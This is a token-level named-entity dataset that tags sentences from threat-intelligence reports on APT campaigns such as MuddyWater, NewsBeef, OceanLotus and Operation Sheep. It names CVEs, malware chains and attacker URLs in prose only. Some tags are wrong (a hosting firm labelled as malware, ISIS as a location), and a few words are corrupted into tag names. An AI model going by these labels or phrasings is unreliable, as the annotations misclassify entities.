+Royal O
+Road O
+weaponizer O
+has O
+resulted O
+in O
+the O
+discovery O
+that O
+multiple O
+Chinese O
+threat B-APT
+groups E-APT
+started O
+utilizing O
+CVE-2018-0798 S-VULID
+in O
+their O
+RTF B-MAL
+weaponizer E-MAL
+. O
+These O
+findings O
+also O
+suggest O
+that O
+the O
+threat B-APT
+groups E-APT
+have O
+robust O
+exploit S-VULNAME
+developing O
+capabilities O
+because O
+CVE-2018-0798 S-VULID
+is O
+not O
+widely O
+reported O
+on O
+and O
+it O
+is O
+typically O
+not O
+incorporated O
+into O
+publicly O
+available O
+weaponizers O
+. O
+In O
+addition O
+, O
+a O
+current O
+ANY.RUN S-FILE
+playback O
+of O
+our O
+observed O
+Elise S-FILE
+infection O
+is O
+also O
+available O
+. O
+Upon O
+opening O
+of O
+the O
+MS O
+Word S-TOOL
+document O
+, O
+our O
+embedded O
+file O
+exploits O
+CVE-2017-11882 S-VULID
+to O
+drop O
+a O
+malicious O
+fake O
+Norton O
+Security O
+Shell O
+Extension O
+module O
+, O
+'NavShExt.dll' S-FILE
+, O
+which O
+is O
+then O
+injected O
+into O
+iexplore.exe S-FILE
+to O
+install O
+the O
+backdoor O
+, O
+begin O
+collection O
+, O
+and O
+activate O
+command O
+and O
+control O
+. O
+Moving O
+through O
+the O
+infection O
+process O
+, O
+NetWitness O
+Endpoint O
+detects O
+the O
+initial O
+exploit S-VULNAME
+CVE-2017-1182 S-VULID
+in O
+action O
+as O
+the O
+Microsoft B-FILE
+Equation I-FILE
+Editor E-FILE
+, O
+'EQNEDT32.exe' S-FILE
+, O
+scores O
+high O
+for O
+potentially O
+malicious O
+activity O
+. O
+Most O
+recently O
+though O
+, O
+a O
+new O
+campaign O
+, O
+targeting O
+Belarus S-LOC
+, O
+Turkey S-LOC
+and O
+Ukraine S-LOC
+, O
+has O
+emerged O
+that O
+caught O
+the O
+attention O
+of O
+Check B-SECTEAM
+Point E-SECTEAM
+researchers O
+. O
+The O
+well-crafted O
+and O
+socially O
+engineered O
+malicious O
+documents O
+then O
+become O
+the O
+first O
+stage O
+of O
+a O
+long O
+and O
+mainly O
+fileless O
+infection O
+chain O
+that O
+eventually O
+delivers O
+POWERSTATS S-FILE
+, O
+a O
+signature O
+PowerShell B-FILE
+backdoor E-FILE
+of O
+this O
+threat O
+group O
+. O
+This O
+powerful O
+backdoor S-FILE
+can O
+receive O
+commands O
+from O
+the O
+attackers O
+, O
+enabling O
+it O
+to O
+exfiltrate O
+files O
+from O
+the O
+system O
+it O
+is O
+running O
+on O
+, O
+execute O
+additional O
+scripts O
+, O
+delete O
+files O
+, O
+and O
+more O
+. O
+If O
+the O
+macros O
+in O
+SPK B-FILE
+KANUN E-FILE
+DEĞİŞİKLİĞİ O
+GİB O
+GÖRÜŞÜ.doc” O
+are O
+enabled O
+, O
+an O
+embedded O
+payload O
+is O
+decoded O
+and O
+saved O
+in O
+the O
+%APPDATA% O
+directory O
+with O
+the O
+name O
+CiscoAny.exe” S-FILE
+. O
+INF B-MAL
+files E-MAL
+have O
+been O
+used O
+in O
+the O
+past O
+by O
+MuddyWater S-APT
+, O
+although O
+they O
+were O
+launched O
+using O
+Advpack.dll S-MAL
+and O
+not O
+IEAdvpack.dll S-MAL
+. O
+In O
+addition O
+, O
+by O
+using O
+VBA2Graph S-FILE
+, O
+we O
+were O
+able O
+to O
+visualize O
+the O
+VBA O
+call O
+graph O
+in O
+the O
+macros O
+of O
+each O
+document O
+. O
+Although O
+it O
+has O
+focused O
+most O
+of O
+its O
+efforts O
+on O
+the O
+Middle B-LOC
+East E-LOC
+region O
+, O
+the O
+political O
+affiliations O
+, O
+motives O
+and O
+purposes O
+behind O
+MuddyWater’s S-APT
+attacks O
+are O
+not O
+very O
+well- O
+defined O
+, O
+thus O
+earning O
+it O
+its O
+name O
+. O
+In O
+the O
+past O
+, O
+countries O
+such O
+as O
+Saudi B-LOC
+Arabia E-LOC
+, O
+the O
+UAE S-LOC
+and O
+Turkey S-LOC
+have O
+been O
+a O
+MuddyWater's S-APT
+main O
+target O
+, O
+but O
+the O
+campaigns O
+have O
+also O
+reached O
+a O
+much O
+wider O
+audience O
+, O
+making O
+their O
+ACT O
+to O
+victims O
+in O
+countries O
+such O
+as O
+Belarus S-LOC
+and O
+Ukraine S-LOC
+. O
+MuddyWater S-APT
+target O
+groups O
+across O
+Middle B-LOC
+East E-LOC
+and O
+Central B-LOC
+Asia E-LOC
+, O
+primarily O
+using O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+with O
+malicious O
+attachments O
+. O
+Most O
+recently O
+MuddyWater S-APT
+were O
+connected O
+to O
+a O
+campaign O
+in O
+March O
+that O
+targeted O
+organizations O
+in O
+Turkey S-LOC
+, O
+Pakistan S-LOC
+, O
+and O
+Tajikistan S-LOC
+. O
+The O
+group O
+has O
+been O
+quite O
+visible O
+since O
+the O
+initial O
+2017 S-TIME
+Malwarebytes O
+report O
+on O
+their O
+elaborate O
+espionage O
+attack O
+against O
+the O
+Saudi B-LOC
+Arabian E-LOC
+government O
+. O
+Our O
+analysis O
+revealed O
+that O
+they O
+drop O
+a O
+new O
+backdoor O
+, O
+which O
+is O
+written O
+in O
+PowerShell S-TOOL
+as O
+MuddyWater’s S-APT
+known O
+POWERSTATS B-MAL
+backdoor E-MAL
+. O
+We O
+assume O
+that O
+RunPow O
+stands O
+for O
+run O
+PowerShell S-TOOL
+, O
+” O
+and O
+triggers O
+the O
+PowerShell S-TOOL
+code O
+embedded O
+inside O
+the O
+.dll B-FILE
+file E-FILE
+. O
+This O
+backdoor S-MAL
+has O
+some O
+features O
+similar O
+to O
+a O
+previously O
+discovered O
+version O
+of O
+the O
+Muddywater S-APT
+backdoor O
+. O
+Based O
+on O
+our O
+analysis O
+, O
+we O
+can O
+confirm O
+that O
+MuddyWater S-APT
+target O
+Turkish B-IDTY
+government I-IDTY
+organizations E-IDTY
+related O
+to O
+the O
+finance S-IDTY
+and O
+energy S-IDTY
+sectors O
+. O
+This O
+is O
+yet O
+another O
+similarity O
+with O
+previous O
+MuddyWater S-APT
+campaigns O
+, O
+which O
+were O
+known O
+to O
+have O
+targeted O
+multiple O
+Turkish S-LOC
+government O
+entities O
+. O
+The O
+main O
+delivery O
+method O
+of O
+this O
+type O
+of O
+backdoor S-FILE
+is O
+spear S-ACT
+phishing S-ACT
+emails S-TOOL
+or O
+spam S-ACT
+that O
+uses O
+social O
+engineering O
+to O
+manipulate O
+targets O
+into O
+enabling O
+malicious O
+documents O
+. O
+Trend B-SECTEAM
+Micro™ E-SECTEAM
+Deep O
+Discovery™ O
+provides O
+detection O
+, O
+in-depth O
+analysis O
+, O
+and O
+proactive O
+response O
+to O
+today’s O
+stealthy O
+malware O
+, O
+and O
+targeted O
+attacks S-APT
+in O
+real O
+time O
+. O
+MuddyWater S-APT
+first O
+surfaced O
+in O
+2017 S-TIME
+. O
+First O
+stage O
+infections O
+and O
+graphical O
+decoys O
+have O
+been O
+described O
+by O
+multiple O
+sources O
+, O
+including O
+in O
+our O
+previous O
+research O
+MuddyWater S-APT
+expands B-ACT
+operations E-ACT
+. O
+MuddyWater S-APT
+compiles O
+various O
+offensive O
+Python S-MAL
+scripts S-MAL
+. O
+This O
+includes O
+Python S-TOOL
+scripts O
+. O
+Usually O
+, O
+the O
+Stageless B-FILE
+Meterpreter E-FILE
+has O
+the O
+Ext_server_stdapi.x64.dll” S-FILE
+, O
+Ext_server_extapi.x64.dll” S-FILE
+, O
+and O
+Ext_server_espia.x64.dll” S-FILE
+extensions O
+. O
+The O
+January B-TIME
+2017 E-TIME
+report O
+followed O
+up O
+on O
+other O
+private O
+reports O
+published O
+on O
+the O
+group’s O
+BeEF-related S-APT
+activity O
+in O
+2015 S-TIME
+and O
+2016 S-TIME
+. O
+Previous O
+analysis O
+of O
+the O
+NewsBeef S-APT
+APT O
+indicates O
+that O
+the O
+group O
+focuses O
+on O
+Saudi B-LOC
+Arabian E-LOC
+and O
+Western S-LOC
+targets O
+, O
+and O
+lacks O
+advanced O
+offensive O
+technology O
+development O
+capabilities O
+. O
+However O
+, O
+in O
+the O
+summer O
+of O
+2016 S-TIME
+, O
+NewsBeef S-APT
+deployed O
+a O
+new O
+toolset O
+that O
+includes O
+macro-enabled B-MAL
+Office I-MAL
+documents E-MAL
+, O
+PowerSploit S-MAL
+, O
+and O
+the O
+Pupy B-MAL
+backdoor E-MAL
+. O
+The O
+most O
+recent O
+NewsBeef S-APT
+campaign O
+uses O
+this O
+toolset O
+in O
+conjunction O
+with O
+spearphishing S-ACT
+emails S-TOOL
+, O
+links O
+sent O
+over O
+social B-ACT
+media/standalone E-ACT
+private B-ACT
+messaging I-ACT
+applications E-ACT
+, O
+and O
+watering B-ACT
+hole E-ACT
+attacks O
+that O
+leverage O
+compromised O
+high-profile O
+websites O
+some O
+belonging O
+to O
+the O
+SA O
+government O
+. O
+The O
+NewsBeef S-APT
+actor O
+deployed O
+a O
+new O
+toolset O
+in O
+a O
+campaign O
+that O
+focused O
+primarily O
+on O
+Saudi B-LOC
+Arabian E-LOC
+targets O
+. O
+NewsBeef S-APT
+continues O
+to O
+deploy O
+malicious O
+macro-enabled O
+Office O
+documents O
+, O
+poisoned O
+legitimate O
+Flash S-MAL
+and O
+Chrome B-MAL
+installers E-MAL
+, O
+PowerSploit S-MAL
+, O
+and O
+Pupy B-MAL
+tools E-MAL
+. O
+The O
+NewsBeef S-APT
+campaign O
+is O
+divided O
+into O
+two O
+main O
+attack O
+vectors O
+, O
+spearphishing S-ACT
+and O
+strategic B-ACT
+web I-ACT
+compromise E-ACT
+watering B-ACT
+hole E-ACT
+attacks O
+. O
+On O
+December S-TIME
+25 S-TIME
+, O
+2016 S-TIME
+, O
+the O
+NewsBeef S-APT
+APT O
+stood O
+up O
+a O
+server O
+to O
+host O
+a O
+new O
+set O
+of O
+Microsoft S-IDTY
+Office O
+documents O
+(maintaining O
+malicious O
+macros O
+and O
+PowerShell S-TOOL
+scripts) O
+to O
+support O
+its O
+spear-phishing S-ACT
+operations O
+. O
+These O
+compromised O
+servers O
+include O
+Saudi B-LOC
+Arabian E-LOC
+government O
+servers O
+and O
+other O
+high-value O
+organizational O
+identities O
+relevant O
+to O
+NewsBeef's S-APT
+targets O
+. O
+However O
+, O
+Kaspersky S-SECTEAM
+Security O
+Network O
+records O
+also O
+contain O
+links O
+that O
+victims O
+clicked O
+from O
+the O
+Outlook S-TOOL
+web O
+client O
+outlook.live.com” S-FILE
+as O
+well O
+as O
+attachments O
+arriving O
+through O
+the O
+Outlook S-TOOL
+desktop O
+application O
+. O
+Interestingly O
+, O
+NewsBeef S-APT
+set O
+up O
+its O
+server O
+using O
+the O
+hosting O
+provider O
+Choopa S-MAL
+, O
+LLC S-MAL
+, O
+US” S-MAL
+, O
+the O
+same O
+hosting O
+provider O
+that O
+the O
+group O
+used O
+in O
+attacks O
+over O
+the O
+summer B-TIME
+of I-TIME
+2016 E-TIME
+. O
+NTG’s S-IDTY
+IT O
+focus O
+and O
+client O
+list O
+likely O
+aided O
+NewsBeef’s S-APT
+delivery O
+of O
+malicious O
+PowerShell-enabled O
+Office O
+documents O
+and O
+poisoned O
+installers O
+. O
+In O
+other O
+schemes O
+, O
+NewsBeef S-APT
+sent O
+macro-enabled O
+Office O
+attachments O
+from O
+spoofed O
+law O
+firm O
+identities O
+or O
+other O
+relevant O
+service O
+providers O
+to O
+targets O
+in O
+SA S-LOC
+. O
+The O
+law O
+firm O
+in O
+this O
+scheme O
+is O
+based O
+in O
+the O
+United B-LOC
+Kingdom E-LOC
+and O
+is O
+the O
+sole O
+location O
+for O
+targets S-APT
+outside O
+of O
+SA S-LOC
+for O
+this O
+campaign O
+. O
+Starting O
+in O
+October B-TIME
+2016 E-TIME
+, O
+NewsBeef S-APT
+compromised O
+a O
+set O
+of O
+legitimate O
+servers O
+(shown O
+below) O
+, O
+and O
+injected O
+JavaScript O
+to O
+redirect O
+visitors O
+to O
+http://analytics-google.org:69/Check.aspx O
+. O
+For O
+example O
+, O
+on O
+a O
+Saudi S-LOC
+government O
+website O
+, O
+the O
+NewsBeef S-APT
+APT O
+delivered O
+packed O
+JavaScript O
+into O
+the O
+bottom O
+of O
+a O
+referenced O
+script O
+that O
+is O
+included O
+in O
+every O
+page O
+served O
+from O
+the O
+site O
+the O
+packed O
+and O
+unpacked O
+JavaScript S-MAL
+is O
+shown O
+below O
+. O
+The O
+JavaScript S-FILE
+forces O
+visiting O
+web O
+browsers O
+to O
+collect O
+and O
+send O
+(via O
+a O
+POST O
+request) O
+web O
+browser O
+, O
+browser O
+version O
+, O
+country O
+of O
+origin O
+, O
+and O
+IP S-PROT
+address O
+data O
+to O
+the O
+attacker O
+controlled O
+server O
+jquerycodedownload.live/check.aspx” O
+. O
+A O
+high O
+volume O
+of O
+redirections S-APT
+from O
+the O
+compromised O
+site O
+continues O
+into O
+mid-January S-TIME
+2017 S-TIME
+. O
+However O
+, O
+as O
+this O
+recent O
+campaign O
+indicates O
+, O
+the O
+NewsBeef S-APT
+APT O
+appears O
+to O
+have O
+shifted O
+its O
+intrusion O
+toolset O
+aACT O
+from O
+BeEF O
+and O
+towards O
+macro-enabled O
+malicious O
+Office B-MAL
+documents E-MAL
+, O
+PowerSploit S-MAL
+, O
+and O
+Pupy S-MAL
+. O
+Despite O
+this O
+shift O
+in O
+toolset O
+, O
+the O
+group O
+still O
+relies O
+on O
+old O
+infrastructure O
+as O
+evidenced O
+by O
+their O
+reuse O
+of O
+servers O
+hosted O
+by O
+the O
+service O
+providers O
+Choopa O
+and O
+Atlantic.net O
+. O
+Its O
+attack B-ACT
+activities E-ACT
+can O
+be O
+traced O
+back O
+to O
+April S-TIME
+2012 S-TIME
+. O
+The O
+OceanLotus S-APT
+reflects S-ACT
+a O
+very O
+strong O
+confrontational O
+ability O
+and O
+willing O
+to O
+attack O
+by O
+keep O
+evolving O
+their O
+techniques O
+. O
+These O
+APT O
+attacks O
+and O
+adopting B-IDTY
+confrontation I-IDTY
+measures E-IDTY
+will O
+exist O
+for O
+a O
+long O
+time O
+. O
+OceanLotus’ S-APT
+targets O
+are O
+global S-LOC
+. O
+OceanLotus S-APT
+have O
+been O
+actively O
+using O
+since O
+at O
+least O
+early B-TIME
+2018 E-TIME
+. O
+OceanLotus S-APT
+malware O
+family O
+samples O
+used O
+no O
+earlier O
+than O
+2017 S-TIME
+. O
+we O
+identified O
+two O
+methods O
+to O
+deliver O
+the O
+KerrDown S-FILE
+downloader O
+to O
+targets O
+. O
+The O
+link O
+to O
+the O
+final O
+payload O
+of O
+KerrDown S-FILE
+was O
+still O
+active O
+during O
+the O
+time O
+of O
+analysis O
+and O
+hence O
+we O
+were O
+able O
+to O
+download O
+a O
+copy O
+which O
+turned O
+out O
+to O
+be O
+a O
+variant O
+of O
+Cobalt O
+Strike O
+Beacon O
+. O
+While O
+investigating O
+KerrDown S-FILE
+we O
+found O
+multiple O
+RAR O
+files O
+containing O
+a O
+variant O
+of O
+the O
+malware O
+. O
+Therefore O
+, O
+it O
+is O
+clear O
+that O
+the O
+OceanLotus S-APT
+group O
+works O
+during O
+weekdays S-TIME
+and O
+takes O
+a O
+break O
+during O
+the O
+weekends O
+. O
+The O
+group O
+was O
+first O
+revealed O
+and O
+named O
+by O
+SkyEye O
+Team O
+in O
+May B-TIME
+2015 E-TIME
+. O
+OceanLotus's S-APT
+targets O
+include O
+China's O
+maritime B-IDTY
+institutions E-IDTY
+, O
+maritime B-IDTY
+construction E-IDTY
+, O
+scientific B-IDTY
+research I-IDTY
+institutes E-IDTY
+and O
+shipping B-IDTY
+enterprises E-IDTY
+. O
+
+RedDrip B-SECTEAM
+Team E-SECTEAM
+(formerly O
+SkyEye B-SECTEAM
+Team E-SECTEAM
+) O
+has O
+been O
+to O
+OceanLotus S-APT
+to O
+keep O
+track O
+of O
+high O
+strength O
+, O
+groupactivity O
+, O
+found O
+it O
+in O
+the O
+near O
+future O
+to O
+Indochinese O
+Peninsula O
+countries O
+since O
+2019 S-TIME
+On O
+April B-TIME
+1 E-TIME
+, O
+2019 O
+, O
+RedDrip S-SECTEAM
+discovered O
+a O
+Vietnamese O
+file O
+name O
+Hop O
+dong O
+sungroup.rar O
+in O
+the O
+process O
+of O
+daily O
+monitoring O
+the O
+attack O
+activities O
+of O
+the O
+OceanLotus S-APT
+. O
+COCCOC S-APT
+is O
+a O
+Vietnam O
+was O
+founded O
+in O
+2013 S-TIME
+. O
+In O
+fact O
+, O
+according O
+to O
+reports O
+of O
+various O
+security O
+vendors O
+, O
+OceanLotus S-APT
+also O
+attacked O
+several O
+countries O
+, O
+including O
+Cambodia S-LOC
+, O
+Thailand S-LOC
+, O
+Laos S-LOC
+, O
+even O
+some O
+victims O
+in O
+Vietnam S-LOC
+, O
+like O
+opinion O
+leaders O
+, O
+media S-IDTY
+, O
+real B-IDTY
+estate I-IDTY
+companies E-IDTY
+, O
+foreign B-IDTY
+enterprises E-IDTY
+and O
+banks S-IDTY
+. O
+Unlike O
+the O
+2016 S-TIME
+variants O
+of O
+Ratsnif S-APT
+that O
+stored O
+all O
+packets O
+to O
+a O
+PCAP O
+file O
+. O
+these O
+threat O
+actors O
+targeted O
+a O
+number O
+of O
+government O
+agencies O
+threat O
+actors S-APT
+targeted O
+a O
+number O
+of O
+government S-IDTY
+agencies S-IDTY
+in O
+East O
+Asia O
+. O
+Attackers S-APT
+relied O
+on O
+Microsoft S-IDTY
+Equation O
+Editor O
+exploit S-VULNAME
+CVE-2018-0798 S-VULID
+to O
+deliver O
+a O
+custom O
+malware O
+that O
+Proofpoint O
+researchers O
+have O
+dubbed O
+Cotx O
+RAT. O
+Maudi S-APT
+Surveillance O
+Operation O
+which O
+was O
+previously O
+reported O
+in O
+2013 S-TIME
+. O
+specifically O
+CVE-2018-0798 S-VULID
+, O
+before O
+downloading O
+subsequent O
+payloads O
+. O
+The O
+dropped O
+PE S-MAL
+file O
+has O
+the O
+distinctive O
+file O
+name O
+8.t” S-FILE
+. O
+The O
+last O
+process O
+is O
+utilized O
+as O
+part O
+of O
+the O
+loading O
+process O
+for O
+Cotx B-APT
+RAT E-APT
+and O
+involves O
+the O
+legitimate O
+Symantec S-SECTEAM
+binary O
+noted O
+above O
+. O
+These O
+conflicts O
+have O
+even O
+resulted O
+in O
+Haftar S-APT
+leading O
+an O
+attack O
+on O
+the O
+capital O
+city O
+in O
+April S-TIME
+. O
+The O
+attackers S-APT
+have O
+targeted O
+a O
+large O
+number O
+of O
+organizations O
+globally O
+since O
+early O
+2017 S-TIME
+. O
+Attackers S-APT
+were O
+initially O
+discovered O
+while O
+investigating O
+a O
+phishing B-ACT
+attack E-ACT
+that O
+targeted O
+political S-IDTY
+figures O
+in O
+the O
+MENA S-LOC
+region O
+. O
+Group's S-APT
+targets O
+include O
+high-profile O
+entities O
+such O
+as O
+parliaments S-IDTY
+, O
+senates S-IDTY
+, O
+top B-IDTY
+state I-IDTY
+offices E-IDTY
+and O
+officials S-IDTY
+, O
+political B-IDTY
+science I-IDTY
+scholars E-IDTY
+, O
+military S-IDTY
+and O
+intelligence B-IDTY
+agencies E-IDTY
+, O
+ministries S-IDTY
+, O
+media B-IDTY
+outlets E-IDTY
+, O
+research B-IDTY
+centers E-IDTY
+, O
+election B-IDTY
+commissions E-IDTY
+, O
+Olympic B-IDTY
+organizations E-IDTY
+, O
+large O
+trading B-IDTY
+companies E-IDTY
+, O
+and O
+other O
+unknown B-IDTY
+entities E-IDTY
+. O
+Cisco B-SECTEAM
+Talos E-SECTEAM
+recently O
+published O
+a O
+blogpost O
+describing O
+targeted O
+attacks O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+which O
+we O
+believe O
+may O
+be O
+connected O
+. O
+Operation B-APT
+Parliament E-APT
+appears O
+to O
+be O
+another O
+symptom O
+of O
+escalating O
+tensions O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+The O
+attackers S-APT
+have O
+taken O
+great O
+care O
+to O
+stay O
+under O
+the O
+radar O
+, O
+imitating S-ACT
+another O
+attack O
+group O
+in O
+the O
+region O
+. O
+With O
+deception O
+and O
+false O
+flags O
+increasingly O
+being O
+employed O
+by O
+threat O
+actors S-APT
+, O
+attribution O
+is O
+a O
+hard O
+and O
+complicated O
+task O
+that O
+requires O
+solid O
+evidence O
+, O
+especially O
+in O
+complex O
+regions O
+such O
+as O
+the O
+Middle B-LOC
+East E-LOC
+. O
+The O
+malware S-FILE
+was O
+first O
+seen O
+packed O
+with O
+VMProtect; O
+when O
+unpacked O
+the O
+sample O
+didn’t O
+show O
+any O
+similarities O
+with O
+previously O
+known O
+malware O
+. O
+The O
+malware S-FILE
+starts O
+communicating O
+with O
+the O
+C&C S-TOOL
+server O
+by O
+sending O
+basic O
+information O
+about O
+the O
+infected O
+machine O
+. O
+The O
+malware S-FILE
+basically O
+provides O
+a O
+remote O
+CMD/PowerShell S-MAL
+terminal O
+for O
+the O
+attackers S-APT
+, O
+enabling O
+them O
+to O
+execute O
+scripts/commands O
+and O
+receive O
+the O
+results O
+via O
+HTTP S-PROT
+requests O
+. O
+What O
+lied O
+beneath O
+this O
+facade O
+was O
+a O
+well-engineered O
+campaign O
+of O
+phishing E-ACT
+attacks O
+designed O
+to O
+steal O
+credentials O
+and O
+spy O
+on O
+the O
+activity O
+of O
+dozens O
+of O
+journalists O
+, O
+human O
+rights O
+defenders O
+, O
+trade O
+unions O
+and O
+labour O
+rights O
+activists O
+, O
+many O
+of O
+whom O
+are O
+seemingly O
+involved O
+in O
+the O
+issue O
+of O
+migrants’ O
+rights O
+in O
+Qatar O
+and O
+Nepal O
+. O
+We O
+refer O
+to O
+this O
+campaign O
+and O
+the O
+associated O
+actor O
+as O
+Operation B-APT
+Kingphish E-APT
+Malik” O
+, O
+in O
+one O
+of O
+its O
+written O
+forms O
+in O
+Arabic S-LOC
+, O
+translates O
+to O
+King” O
+. O
+It O
+is O
+worth O
+noting O
+that O
+in O
+December B-TIME
+2016 E-TIME
+, O
+Amnesty O
+International O
+published O
+an O
+investigation O
+into O
+another O
+social O
+engineering O
+campaign O
+perpetrated O
+by O
+a O
+seemingly O
+fake O
+human O
+rights O
+organization O
+known O
+as O
+Voiceless S-APT
+Victims O
+, O
+which O
+targeted O
+international O
+human O
+rights O
+and O
+labour O
+rights O
+organizations O
+campaigning O
+on O
+migrant O
+workers’ O
+rights O
+in O
+Qatar O
+. O
+It O
+appears O
+that O
+the O
+attackers S-APT
+may O
+have O
+impersonated O
+the O
+identity O
+of O
+a O
+real O
+young O
+woman O
+and O
+stole O
+her O
+pictures O
+to O
+construct O
+the O
+fake O
+profile O
+, O
+along O
+with O
+a O
+professional O
+biography O
+also O
+stolen O
+from O
+yet O
+another O
+person O
+. O
+In O
+the O
+course O
+of O
+this O
+email S-TOOL
+correspondence O
+, O
+the O
+attacker S-APT
+— O
+Safeena” O
+— O
+then O
+sent O
+what O
+appeared O
+to O
+be O
+invitations S-ACT
+to O
+access O
+several O
+documents O
+on O
+Google O
+Drive O
+. O
+The O
+attackers S-APT
+were O
+meticulous O
+in O
+making O
+their O
+phishing B-ACT
+page E-ACT
+as O
+credible O
+as O
+possible O
+. O
+Among O
+the O
+targets O
+of O
+this O
+campaign O
+is O
+the O
+International O
+Trade B-IDTY
+Union I-IDTY
+Confederation E-IDTY
+. O
+
+Both O
+in O
+the O
+attacks O
+against O
+ITUC S-IDTY
+and O
+in O
+other O
+occasions O
+, O
+Operation B-APT
+Kingphish E-APT
+approached O
+selected O
+targets O
+over O
+social B-MAL
+media E-MAL
+, O
+prominently B-MAL
+Facebook E-MAL
+, O
+and O
+engaged O
+in O
+chat O
+conversations O
+with O
+them O
+on O
+and O
+off O
+, O
+sometimes O
+over O
+a O
+period O
+of O
+several O
+months O
+. O
+This O
+time O
+the O
+document O
+purported O
+to O
+be O
+about O
+the O
+involvement O
+of O
+the O
+Emir S-LOC
+of O
+Qatar S-LOC
+in O
+funding O
+ISIS S-LOC
+, O
+which O
+was O
+seemingly O
+copied O
+from O
+a O
+website O
+critical O
+of O
+Qatar O
+. O
+While O
+there O
+is O
+a O
+clear O
+underlying O
+Qatar S-LOC
+migrant O
+workers O
+theme O
+in O
+Operation B-APT
+Sheep E-APT
+, O
+it O
+is O
+also O
+hypothetically O
+possible O
+that O
+these O
+attacks O
+could O
+have O
+been O
+perpetrated O
+by O
+a O
+malicious O
+actor O
+affiliated O
+to O
+a O
+different O
+government O
+with O
+an O
+interest O
+in O
+damaging O
+the O
+reputation O
+of O
+the O
+State O
+of O
+Qatar S-LOC
+. O
+Dubbed O
+‘Operation B-APT
+Sheep’ E-APT
+, O
+this O
+massive O
+data O
+stealing O
+campaign O
+is O
+the O
+first O
+known O
+campaign O
+seen O
+in O
+the O
+wild O
+to O
+exploit S-VULNAME
+the O
+Man-in-the-Disk S-VULNAME
+vulnerability O
+revealed O
+by O
+Check O
+Point O
+Research O
+earlier O
+last O
+year O
+. O
+The O
+SDK S-MAL
+, O
+named O
+SWAnalytics S-FILE
+is O
+integrated O
+into O
+seemingly O
+innocent O
+Android S-OS
+applications O
+published B-ACT
+on E-ACT
+major O
+3rd O
+party O
+Chinese O
+app O
+stores O
+such O
+as O
+Tencent B-IDTY
+MyApp E-IDTY
+, O
+Wandoujia S-IDTY
+, O
+Huawei B-IDTY
+App I-IDTY
+Store E-IDTY
+, O
+and O
+Xiaomi B-IDTY
+App I-IDTY
+Store E-IDTY
+. O
+After O
+app O
+installation O
+, O
+whenever O
+SWAnalytics S-FILE
+senses O
+victims O
+opening O
+up O
+infected O
+applications O
+or O
+rebooting O
+their O
+phones O
+, O
+it O
+silently O
+uploads O
+their O
+entire O
+contacts O
+list O
+to O
+Hangzhou O
+Shun O
+Wang O
+Technologies O
+controlled O
+servers O
+. O
+In O
+theory O
+, O
+Shun B-APT
+Wang E-APT
+Technologies O
+could O
+have O
+collected O
+a O
+third O
+of O
+China’s S-LOC
+population O
+names O
+and O
+contact O
+numbers O
+if O
+not O
+more O
+. O
+With O
+no O
+clear O
+declaration O
+of O
+usage O
+from O
+Shun B-APT
+Wang E-APT
+, O
+nor O
+proper O
+regulatory O
+supervision O
+, O
+such O
+data O
+could O
+circulate O
+into O
+underground O
+markets O
+for O
+further O
+exploit S-VULNAME
+, O
+ranging O
+from O
+rogue O
+marketing O
+, O
+targeted O
+telephone O
+scams O
+or O
+even O
+friend O
+referral O
+program O
+abuse O
+during O
+November’s O
+Single’s O
+Day O
+and O
+December’s O
+Asian O
+online O
+shopping O
+fest O
+. O
+This O
+paper O
+will O
+cover O
+the O
+discovery O
+of O
+this O
+campaign O
+, O
+dubbed O
+‘Operation B-APT
+Sheep’ E-APT
+, O
+and O
+an O
+analysis O
+of O
+SWAnalytics S-ACT
+. O
+In O
+mid-September O
+, O
+an O
+app O
+named O
+‘Network B-APT
+Speed I-APT
+Master’ E-APT
+stood O
+out O
+on O
+our O
+radar O
+with O
+its O
+rather O
+unusual O
+behavior O
+patterns O
+. O
+This O
+module S-FILE
+monitors O
+a O
+wide O
+range O
+of O
+device O
+activities O
+including O
+application O
+installation O
+/ O
+remove O
+/ O
+update O
+, O
+phone O
+restart O
+and O
+battery O
+charge O
+. O
+It O
+turns O
+out O
+that O
+contacts O
+data O
+isn’t O
+the O
+only O
+unusual O
+data O
+SWAnalytics S-FILE
+is O
+interested O
+in O
+. O
+With O
+default O
+settings O
+, O
+SWAnalytics S-FILE
+will O
+scan O
+through O
+an O
+Android S-OS
+device’s O
+external O
+storage O
+, O
+looking O
+for O
+directory O
+tencent/MobileQQ/WebViewCheck” O
+. O
+From O
+our O
+first O
+malicious B-FILE
+sample E-FILE
+encounter O
+back O
+in O
+mid-September S-TIME
+until O
+now O
+, O
+we O
+have O
+observed O
+12 O
+infected O
+applications O
+, O
+the O
+majority O
+of O
+which O
+are O
+in O
+the O
+system O
+utility O
+category O
+. O
+By O
+listing O
+sub-folders O
+, O
+SWAnalytics S-FILE
+is O
+able O
+to O
+infer O
+QQ O
+accounts O
+which O
+have O
+never O
+been O
+used O
+on O
+the O
+device O
+. O
+Operation B-APT
+Sheep E-APT
+is O
+the O
+first O
+campaign O
+we O
+have O
+observed O
+in O
+the O
+wild O
+that O
+abuses B-ACT
+similar I-ACT
+concept E-ACT
+since O
+our O
+MitD O
+publication O
+. O
+To O
+make O
+this O
+data O
+harvesting O
+operation O
+flexible O
+, O
+SWAnalytics S-FILE
+equips O
+the O
+ability O
+to O
+receive O
+and O
+process O
+configuration O
+files O
+from O
+a O
+remote O
+Command-and-Control O
+. O
+Whenever O
+users O
+reboot O
+their O
+device O
+or O
+open O
+up O
+Network B-ACT
+Speed I-ACT
+Master E-ACT
+, O
+SWAnalytics S-FILE
+will O
+fetch O
+the O
+latest O
+configuration O
+file O
+from O
+http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” O
+. O
+In O
+order O
+to O
+understand O
+SWAnalytics’ S-FILE
+impact O
+, O
+we O
+turned O
+to O
+public O
+download O
+volume O
+data O
+available O
+on O
+Chandashi O
+, O
+one O
+of O
+the O
+app O
+store O
+optimization O
+vendors O
+specialized O
+in O
+Chinese S-LOC
+mobile O
+application O
+markets O
+. O
+Data O
+points O
+span O
+from O
+September B-TIME
+2018 E-TIME
+to O
+January B-TIME
+2019 E-TIME
+where O
+we O
+observed O
+over O
+17 O
+million O
+downloads O
+in O
+just O
+five O
+months O
+. O
+In O
+China S-LOC
+alone O
+, O
+we O
+have O
+seen O
+underground O
+market O
+sheep B-APT
+shavers” E-APT
+ported O
+SMS O
+rogue O
+marketing O
+strategy O
+to O
+spread O
+Alipay O
+Red O
+Packet O
+referral O
+URL O
+links O
+. O
+In O
+Operation O
